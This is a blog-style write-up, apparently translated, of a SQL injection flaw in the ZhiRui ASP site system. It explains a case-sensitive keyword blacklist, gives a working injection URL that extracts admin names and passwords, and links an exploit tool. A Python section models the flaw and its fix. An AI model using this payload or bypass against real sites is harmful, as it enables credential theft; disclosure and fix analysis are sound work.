Why?
Why is it vulnerable? Is it because all of the author's code is self-written? So far we have tested and compromised both the enterprise website management system and the school website management system.
Without further ado, let's look at the code, starting with the info_show.asp file; the other files are similar.
Dim ClassId, TopID, ClassName, Inid, SeoTitle, LePl
ClassId = Request.QueryString("ClassId")   ' ClassId is used for filtering; note it is taken as a raw string, unlike InfoId below
TopID = Request.QueryString("TopID")
Inid = Int(Request.QueryString("InfoId"))   ' InfoId is converted to an integer, so it cannot carry a string payload
LePl = Request.Form("LePl")
Call SeoUi("zhi_rui_E_io_Class", "info", ClassId)   ' Calls the self-written SeoUi function, which takes ClassId to the database for the query
Call Kio("zhi_rui_E_io", "info", Inid)
However, the page begins by including an anti-injection file, <!--#include file="Include/Nsql.asp"-->. Since injection is still possible, we should look at the code of this anti-injection file:
Dim SQL_inj, SQL_Get, SQL_Data, SQL_Post
SQL_inj = Split(DataNsql, "|")   ' DataNsql is the "|"-separated blacklist string defined earlier in Nsql.asp
If Request.QueryString <> "" Then
    For Each SQL_Get In Request.QueryString
        For SQL_Data = 0 To UBound(SQL_inj)
            If InStr(Request.QueryString(SQL_Get), SQL_inj(SQL_Data)) > 0 Then
                Response.Write "<Script Language=javascript>alert('Note: Do not submit illegal requests! http://www.ZhiRui.net');history.back(-1)</Script>"
                Response.End()
            End If
        Next
    Next
End If
If Request.Form <> "" Then
    For Each SQL_Post In Request.Form
        For SQL_Data = 0 To UBound(SQL_inj)
            If InStr(Request.Form(SQL_Post), SQL_inj(SQL_Data)) > 0 Then
                Response.Write "<Script Language=javascript>alert('Note: Do not submit illegal requests! http://www.ZhiRui.net');history.back(-1)</Script>"
                Response.End()
            End If
        Next
    Next
End If
The anti-injection code looks normal at first glance, but there is still a problem. Take a closer look at this line: If InStr(Request.Form(SQL_Post), SQL_inj(SQL_Data)) > 0 Then
What is missing is the LCase function. That is to say, the current anti-injection only defends against "and", not "And": InStr only returns the character position and, by default, compares case-sensitively, so it does not match across case. The fix is to add LCase, changing it to LCase(Request.Form(SQL_Post)). Knowing the cause of the problem, let's look at the characters that are filtered: DataNsql = "and|exec|insert|select|delete|update|count|chr|mid|master|truncate|char|declare|set|from|="
Note that the last entry filters out the equal sign, which has no upper- or lower-case form to switch to, but that's fine: I don't need an equal sign, since a comparison such as a larger number against a smaller one works just as well. Here is an injection statement:
http://test.3est.com/info_Show.asp?InfoId=175&ClassId=27%20And%201>2%20Union%20Select%201,Password%2Badminname%20From%20zhi_rui_e_manage
Because the equal sign is filtered, I used 1>2 here to make the first condition false so that the following Union query is executed.
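The filter flaw above, modelled in Python as an added example (not code from the post or from the CMS): the original case-sensitive blacklist check beside the LCase-style fix, and an integer check for ClassId of the kind Int() already gives InfoId, which is the stronger defence for a numeric id. The sample parameter values are constructed from the post's request.

```python
import re

# Blacklist from the post's Nsql.asp (DataNsql), split on "|" as the ASP code does
DATA_NSQL = "and|exec|insert|select|delete|update|count|chr|mid|master|truncate|char|declare|set|from|="
SQL_INJ = DATA_NSQL.split("|")


def nsql_original(value: str) -> bool:
    """Original check: VBScript InStr defaults to a binary (case-sensitive)
    compare, so 'And' or 'Select' never match the lower-case blacklist."""
    return any(term in value for term in SQL_INJ)


def nsql_fixed(value: str) -> bool:
    """The fix proposed in the post: lower-case the input before matching
    (LCase(Request.Form(...)) in the ASP code)."""
    lowered = value.lower()
    return any(term in lowered for term in SQL_INJ)


def request_blocked(params: dict, check) -> bool:
    """Mirror of the Nsql.asp loop: every parameter is run through the
    blacklist check, and a single hit blocks the whole request."""
    return any(check(v) for v in params.values())


def validate_class_id(value: str) -> int:
    """Blacklist-free check for a numeric id: ClassId must be a plain integer,
    exactly as Int() already enforces for InfoId in info_show.asp.
    Anything else is rejected before it can reach the SQL string."""
    if not re.fullmatch(r"\d{1,9}", value.strip()):
        raise ValueError("ClassId must be a positive integer")
    return int(value.strip())


# Constructed samples: a normal request and the post's request, URL-decoded.
NORMAL_REQUEST = {"InfoId": "175", "ClassId": "27"}
INJECTED_REQUEST = {
    "InfoId": "175",
    "ClassId": "27 And 1>2 Union Select 1,Password+adminname From zhi_rui_e_manage",
}

if __name__ == "__main__":
    for name, req in (("normal", NORMAL_REQUEST), ("injected", INJECTED_REQUEST)):
        print(name, "original blocks:", request_blocked(req, nsql_original),
              "fixed blocks:", request_blocked(req, nsql_fixed))
```

Even with LCase the check remains a keyword blacklist; the integer check (or a parameterized query) removes the class of problem rather than one spelling of it.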
The vulnerability has been reported to the official team, and I benefited a lot from talking with them, so publication of this hole was delayed a few days. In those days I wrote an exploitation program:
enter the infoid and classid as the IDs you see in search-engine results,
and download it from my online storage. Given this poor little space it won't be uploaded here; the source code and tools are all there. Note that I added a sound to the program to make it speak, which may make it a little large, but I can't help that.
http://cid-31cbc2374bc1f024.skydrive.live.com/home.aspx
It is zhirui.rar in the tool folder.